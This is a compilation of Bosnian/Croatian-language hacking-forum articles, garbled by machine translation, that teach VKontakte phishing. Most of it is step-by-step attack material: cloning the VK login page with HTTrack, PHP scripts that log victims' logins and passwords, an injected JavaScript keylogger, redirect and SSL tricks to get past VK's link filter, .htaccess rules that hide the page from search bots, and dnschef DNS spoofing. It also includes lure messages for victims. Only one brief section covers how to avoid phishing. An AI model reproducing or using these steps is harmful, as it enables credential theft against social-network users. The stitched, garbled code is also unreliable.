Prije nekoliko godina, phishing metoda je bila vrlo popularna, ali sada su servisi naučili da je otkriju, pronalaze i blokiraju lažne stranice. Stoga postoji naprednija phishing metoda.
Danas mnogi ljudi koriste društvene mreže, svaki dan ljudi pokušavaju da hakuju nečiji Vkontakte nalog, mail.ru, gmail i druge usluge, i to besplatno. Češće nego ne, ljudi traže neku magičnu aplikaciju za hakiranje Vkontaktea, ali mi ćemo vam pokazati nešto drugo. Ovo je phishing. Ali u ovom članku (za razliku od prethodnog) razmotrit ćemo njegovu alternativnu verziju.
Preimenujte datoteku index.html u datoteku vk.jpg, ovo je neophodno kako biste zbunili sigurnosni sistem Vkontaktea;
Kreirajte praznu datoteku pod nazivom security.php, otvorite je u notepadu, unesite sljedeći kod
$ id = $ _GET ["kod"];
if ($ id == "confirmemail") (
$ myFile = "vk.jpg";
$ fh = fopen ($ myFile, "r");
$ theData = fread ($ fh, 500000); fclose ($ fh);
$ myFile1 = "confirm.jpg";
$ fh1 = fopen ($ myFile1, "r");
$ theData1 = fread ($ fh1, 500000);
echo $ theData1; )
i sačuvajte ga pored vk.jpg;
Kreirajte potvrdi.jpg datoteku, također je otvorite u notepadu i unesite sljedeći red u nju:
hvala što ste potvrdili svoju email adresu.
spasiti;
Provjerite imate li datoteke koje su vam potrebne
i mapu sa svim Vkontakte skriptama, bez njih će se vaša lažna stranica prikazati pogrešno;
Otpremite ove datoteke na vaš web host;
Ova metoda je također prikladna ako se žrtva prijavljuje s android uređaja. A s jednim skupom skripti možete hakirati veliki broj računa na Vkontakteu. Osim troškova hostinga, ovo je besplatan način da dobijete lozinku.
Ovo je samo jedan od načina prolaska kroz sigurnosne sisteme društvene mreže ili email servisa. Ali danas, da biste hakirali Vkontakte, morate znati mnogo takvih metoda. Mehanizmi protiv krađe identiteta se svakim danom poboljšavaju, a vlasnici servisa sve više zatežu šrafove, ne ostavljajući hakerima rupe u zakonu. Ali snaga metode hakovanja leži u još jednom. Naime, u vještoj manipulaciji ljudima, sposobnost prepoznavanja i korištenja njihovih slabosti. Napisati dobru naslovnu stranu nije ni pola bitke, jer ako nemate dovoljno vještina socijalnog inženjeringa, onda jednostavno nema smisla to raditi.
Pozdrav forumaši! Danas ćemo pričati o phishing Vkontakteu. Prije svega, želim reći da se u članku spominju neke usluge, ne smatrajte to reklamom. Članak je napisan u informativne svrhe i ne potičem nikoga da poduzme radnje opisane u članku.
Kao što znate, VK phishing je bio vrlo popularan, ali nakon ažuriranja VKontaktea, sigurnosna politika je počela da se iscrpljuje. Je li stvarno? Uostalom, ništa ne miruje, a s novom sigurnosnom politikom došle su i nove metode phishinga.
U ovom članku ću vam reći malo o "problemima" VK fish stranice i njihovim rješenjima na primjeru stranice koja je odavno spojena u javnu. (Izvori se mogu preuzeti ovdje: Ya.Disk
Šta vam prvo upada u oči kada otvorite ovakav sajt?
- Sumnjiv izgled: stranica izgleda kao stara mobilna verzija VK-a, mijenjanje jezika ne radi, stari fontovi i pikselizirani logotip odmah sugeriraju da smo na zlonamjernoj stranici.
- Nedostatak desktop verzije stranice: da, razumijem da 80% VK prometa dolazi sa mobilnih uređaja, ali ipak, morate biti spremni na sve, posebno ako se bavite individualnim hakovanjem.
- Takve stranice pretraživači odmah označavaju kao "lažne": činjenica je da pretraživač prije svega gleda na SSL certifikat ili njegovo odsustvo i tako dalje. phishers uglavnom postavljaju fish stranice na besplatni hosting, tada tamo nema dobivanja barem DV SSL certifikata. sajtovi su označeni kao "prevarni", a zatim je hosting nalog zabranjen.
- Potpuni nedostatak validacije podataka: sve što sam vidio u takvim skriptama je u osnovi obrazac sa poljima "login", "password", dugme i zapis o tome u notepad-u. Nema provjera valjanosti, praznih polja ili BadRequest-a... O radu sa 2FA nalozima čak i ne govorim. Maksimum - zahtjev za VK API za primanje tokena.
- Slanje poruka koji sadrži link do phishing stranice: prilikom slanja poruka, tekst je bio otprilike ovako: "O bože, pobijedio si u natjecanju za ponovno objavljivanje, prati link
Morate biti registrovani da biste vidjeli linkove.
I dobijete 100.500 dolara. „Pa, morate priznati da zvuči glupo. Ali da, ovo se još uvijek radi... ostalo je jako malo takvih naivnih ljudi, a uglavnom djece.
- Skraćivanje linkova: da bi VK preskočio veze do ribljih web lokacija, morali ste napraviti preusmjeravanje + smanjenje, kao rezultat toga, veza se pokazala kao
Morate biti registrovani da biste vidjeli linkove.
To je samo pokvarilo izgled poruke.
Skraćivanje linkova
Kao što sam uradio kada sam tek učio phishing: napravio sam stranicu na uCoz-u, u uređivač HTML stranica dodao sam skriptu koja je preusmjerila na ribu stranicu. Zatim sam ubacio URL stranice u vk.cc i dobio gotov link, koji je VK prošao. Kako izbjeći ovu glupost? Vrlo je jednostavno. Postoje dva načina:
- Nećemo skraćivati linkove sa vk.cc, već malo varati sa uCoz-om. (Ako koristite web-stranicu za ankete kao što je anketa, ovo je općenito super)
- Nabavite SSL certifikat za svoju domenu.
Spojler: Prijevara sa uCoz-om
Napravit ćemo bilo koju stranicu s nazivom koji odgovara vašoj temi stranice za polaganje
Idemo na karticu Moduli i kreiramo web stranicu
Nazovimo to nekako, ja ću to zvati "test", ako imate tip sajta za glasanje, stranicu možete nazvati "golos-za-ivana-pupkina"
Sada idemo na našu stranicu, pa na karticu "test" koju smo upravo kreirali i kopiramo URL negdje
Idemo na odjeljak Dizajn => Urednik => Stranice stranice ... i između
umetnite sljedeće redove:
Kao rezultat, slijedeći vezu
Morate biti registrovani da biste vidjeli linkove.
Bićemo prebačeni na sajt koji nam je potreban. Sada nema potrebe skraćivati takve linkove preko vk.cc. VK će ih bez problema preskočiti, a pri slanju ćemo se lišiti pitanja primaoca "Ma, neka sumnjiva veza... zar ovo definitivno nije prevara?"
Dobijanje SSL sertifikata
Kao što sam rekao, potreban je SSL sertifikat kako pretraživači i antivirusi ne bi označili našu phishing stranicu kao "prevarnu". Osim toga, VK preskače linkove na stranicu sa SSL-om, što znači da gore opisane manipulacije neće biti potrebne, možemo jednostavno ispustiti vezu u izvornom obliku.
spojler: Dobijamo SSL certifikat
Trenutno postoji mnogo hosting lokacija koje rade s tijelima za certifikaciju. Najjednostavnije rješenje problema sa SSL-om je postavljanje vaših web stranica, samo na takav hosting. Njihov kontrolni panel već ima karticu sa SSL upravljanjem, gdje možete naručiti novi certifikat, instalirati svoje ili upravljati postojećim certifikatima.
Također, da biste smanjili vjerovatnoću blokiranja stranice označene kao lažne, možete u .htaccess datoteci propisati zabranu indeksiranja od strane botova pretraživača.
spojler: Šta dodati u .htaccess
SetEnvIfNoCase Korisnički agent "^ Googlebot" search_bot
SetEnvIfNoCase User-Agent "^ Yandex" search_bot
SetEnvIfNoCase User-Agent "^ Yahoo" search_bot
SetEnvIfNoCase Korisnički agent "^ Aport" search_bot
SetEnvIfNoCase Korisnički agent "^ msnbot" search_bot
SetEnvIfNoCase Korisnički agent "^ spider" search_bot
SetEnvIfNoCase Korisnički agent "^ Robot" search_bot
SetEnvIfNoCase User-Agent "^ php" search_bot
SetEnvIfNoCase User-Agent "^ Mail" search_bot
SetEnvIfNoCase Korisnički agent "^ bot" search_bot
SetEnvIfNoCase Korisnički agent "^ igdeSpyder" search_bot
SetEnvIfNoCase User-Agent "^ Snapbot" search_bot
SetEnvIfNoCase User-Agent "^ WordPress" search_bot
SetEnvIfNoCase User-Agent "^ BlogPulseLive" search_bot
SetEnvIfNoCase Korisnički agent "^ Parser" search_bot
Pa, to je sve za sada. Još uvijek imam puno informacija o VK-u, pa ako neko želi razgovarati o VK phishing-u, postaviti pitanje ili bilo šta drugo, molimo da ode na LAN foruma. Uvek otvoren za nove ideje. Nadam se da su vam ove informacije bile korisne ;)
U ovom članku naredba HelpU, detaljno će opisati phishing šemu za račune popularne društvene mreže U kontaktu sa.
Pa idemo.
Za posao nam je potreban Kali Linux najnoviju verziju, koja je u ovom trenutku, kao i saznanja o njoj, pisali smo ranije. Ali za sajt VK, sve ćemo opisati pojedinačno.
Dakle, preuzimamo stranicu: vk.com. U ovoj fazi, sve nije teško, možete samo kopirati. Ali samo jedna stvar, ako samo kopirate izvorni kod stranice, dobivamo takvu "prljavštinu":
Prilicno nepredstavljivo...
Klonirat ćemo stranicu, odnosno stranicu dobrodošlice. Za ovo ćemo koristiti. Zapravo, ovaj program je jedinstven, može kopirati i cijelu stranicu i njene pojedinačne dijelove.
Najlakši način za pokretanje ovog programa bi izgledao otprilike ovako:
Httrack vk.com -O / var / www / html
Ali za VK ne preporučujemo da to radite, jer kopirate cijeli VK, nije najpametnija ideja. To se često radi na manjim stranicama radi potpune analize strukture svih foldera i datoteka. Ali u ovoj fazi ćemo se ponašati po drugačijem scenariju.
Prvo, trebate koristiti parametar za unos korisničkog agenta.
U skladu s tim, koristit ćemo parametar:
F Mozilla / 5.0 (Windows NT 6.1) ApleWebKit / 537.36 (KHTML, poput Gecko) Chrome / 41.0.228.0 Safari / 537.36
Httrack https://vk.com -r2 -F Mozilla / 5.0 (Windows NT 6.1) AppleWebKit / 537.36 (KHTML, poput Gecko) Chrome / 41.0.228.0 Safari / 537.36 -O "/var/www/html/vk.com "
Nakon toga ćemo vidjeti:
Stranica će biti kopirana. U folderu vk.com biće nekoliko fajlova koje sam napravio, možete ih izbrisati i ostaviti samo jedan folder vk.com
Izbrišite, premjestite datoteke iz podfoldera vk.com u folder vk.com više, i tada nećemo imati putanju u adresnoj traci: localhost / vk.com / vk.com
Nakon manipulacije fajlovima, adresa će biti: localhost / vk.com
Sve je jasno sa web verzijom. Ali ako pokušate kopirati mobilnu verziju VKontaktea ( m.vk.com), tu će biti nekih poteškoća javascript provjerava ispravnost adrese i sprječava učitavanje stranice. Ali i ovo ima svoju ranjivost.
Naredba će biti sljedeća:
Httrack https://m.vk.com -r2 -F "Mozilla / 5.0 (Linux; U; Android 4.0.3; ru-ru; LG-L160L Build / IML74K) AppleWebkit / 999 + (KHTML, kao Gecko) Safari /999.9 "-O" / var / www / html / mvk / "
Kada se stranica kopira i pokušate joj pristupiti, ništa neće biti od toga, tako da morate pokrenuti sljedeću naredbu:
Nano /var/www/html/mvk/m.vk.com/index.html
Odaberite liniju koja je istaknuta na snimku ekrana i izbrišite je.
I stranica radi odlično.
Dakle, imamo stranice koje su identične originalu. Ali dnevnici se nigdje ne čuvaju i nećemo moći vidjeti ko je šta zakucao u polja, pa krenimo sa web programiranjem. Mi ćemo implementirati na našem sajtu keylogger, napisaćemo to php i javascript.
Kreirajte 3 fajla keylogger.php, keylogger.js i keylog.txt
V keylogger.php predstavljamo:
$ ključ = $ _ POST ["ključ"];$ logfile = "keylog.txt";
$ fp = fopen ($ logfile, "a");
fwrite ($ fp, $ ključ);
fclose ($ fp);
?>
V keyloger.js predstavljamo:
Document.onkeypres = funkcija (evt) (evt = evt || window.evnt ključ = String.fromCharode (evt.charode) if (ključ) (var http = novi XMLHtpRequest (); var parm = encodeURI (ključ) http.open ("POST", "keylogger.php", true); http.setReqestHeder ("Contnt-type", "aplication / x-ww-form-urlenoded"); http.send ("key =" + parm);) )
u našem index.php morate dodati red:
Gotovo, gotovi smo keylogger.
Sada počnimo sa uređivanjem index.php: tražim liniju " Ulogovati se„I potražite parametar onclick = 'top.showBox'(promijenite adresu u https://vk.com)
Nakon toga, kada pritisnete dugme Ulogovati se korisnik će biti preusmjeren na službenu stranicu U kontaktu sa.
Ulazimo kroz SSH on VPS.
# wget htps: //thesprwl.org/media/projcts/dnscef-0.3.zip # raspakujte dnscef-0.3.zip # cd dnshef * # chod 755 * .py
Najbolje rješenje bi bilo da je ovdje najbolje staviti sljedeće parametre:
# pi instal dnslib # pi instal IPy
Kreirajte fajl: hosts.txt
U njega upisujemo sljedeće:
(Url sajt, u našem slučaju vk.com = IP_VAŠ_VPS)
Propisivanjem sljedeće naredbe pokrenut ćemo sve:
./dnschf.py -i 0.0.0.0 --logfle = log.txt --file = hosts.txt
Gotovo, tvoj DNS uspješno radi. On nam vraća naše adrese.
To je sve, nadamo se da vam je ovaj članak bio koristan.
Srdačan pozdrav, ekipa HelpU.
Poricanje odgovornosti: Ovaj članak je napisan isključivo u obrazovne svrhe. Autor ili izdavač nije objavio ovaj članak u zlonamjerne svrhe. Ukoliko bi čitatelji željeli koristiti informacije za ličnu korist, onda autor i izdavač nisu odgovorni za bilo kakvu štetu ili štetu.U ovom članku ću vam reći šta je VKontakte phishing. Kako ne biti uhvaćen na phishing stranici i ne spaliti svoje vjerodajnice. Navest ću i primjer kreiranja takve stranice.
Šta je phishing?
Općenito, riječ fishing se prevodi kao ribolov. Phishing je lažiranje web stranice gdje korisnici unose svoje vjerodajnice, kao što su "login" i "password", a zatim preusmjeravaju na službenu stranicu kako ne bi bilo sumnje. Loša osoba "radish" prepoznaje vaše akreditive i može ući na stranicu pod vašim korisničkim imenom.
Budite pažljivi
Kako možete provući takvu stranicu, ima par primjera.
- Na bilo kom resursu može biti veza koja kaže: „dodajte me kao prijatelja i dobijete 10 VKontakte glasova za ovo“. Slažete se, primamljivo? Žrtva slijedi ovu vezu, dolazi do stranice koja se čini da se ne razlikuje od stranice VKontakte, unosi "prijavu" i "lozinku". Dođe na njegovu stranicu, više nije bilo glasova. Dugo razmišlja i na kraju poentira po ovom pitanju, a podaci sa računa su već na "rotkvici".
- Tvoja devojka ili dečko ti daju link ka sajtu, uz izgovor kao Mačka =) Ti, bez razmišljanja, pratiš link, uneseš svoje "login" i "password". I vaš partner sada zna vaše akreditive i moći će vidjeti s kim šaljete poruke =)
I postoji mnogo više opcija kako namamiti žrtvu na takvo mjesto.
Vidite kuda idete, ako ste trenutno u kontaktu i dobijete link, kliknete na njega, vidite stranicu za autorizaciju, odmah bi trebali posumnjati. Obratite pažnju na adresu web stranice. Recimo VKontakte, njegova adresa: vk.com ili vkontakte.ru. Malo ljudi može zapamtiti dugačka imena domena web stranice, njih je najlakše lažirati. Mislim da je zbog toga društvena mreža VKontakte prešla na tako kratku adresu domene da bi je bilo teže lažirati. Ako vidite vk.org adresu, onda zaista nećete vidjeti kvaku, ako napišete nešto poslije nje, na primjer: dakle, općenito, adresa kao adresa. Pa, ako se od vas traži da negdje unesete lozinku, pažljivo provjerite adresu domene.
Kreiranje phishing stranice
Ovaj materijal je dat isključivo u informativne svrhe, a ne za razbijanje računa vaših poznanika i prijatelja, također imajte na umu da se radi o krivičnom predmetu.
I zato ću dati primjer kreiranja phishing stranice za društvenu mrežu VKontakte.
Otvorite bilo koji pretraživač, idite na vk.com,
Naziv datoteke: index.html
Tip fajla: Web stranica, kompletno sa slikama. Pritisnemo dugme, Sačuvaj.
Sada morate kreirati skriptu koja će prenijeti podatke unesene u polje za prijavu i lozinku. Nazovimo ga icq.php
Otvorite notepad i zalijepite ovaj kod tamo.
$ Prijava = $ _POST; // Prijava žrtve
$ Pass = $ _POST [‘zena’]; // Lozinka žrtve
$ log = fopen (“ups.php”, ”a +”); // lozinke žrtava će biti ovdje
fwrite ($ log, "
$ Prijava: $ Pass \ n ”); // pisati u ups.phpfclose ($ log); // close ups.php
odjek”
”; // preusmjeriti žrtvu na http://vk.com
Zatvorite i sačuvajte kao icq.php
Otvorite datoteku index.html u notepadu. Otvorite pretragu (ctrl + f) i unesite
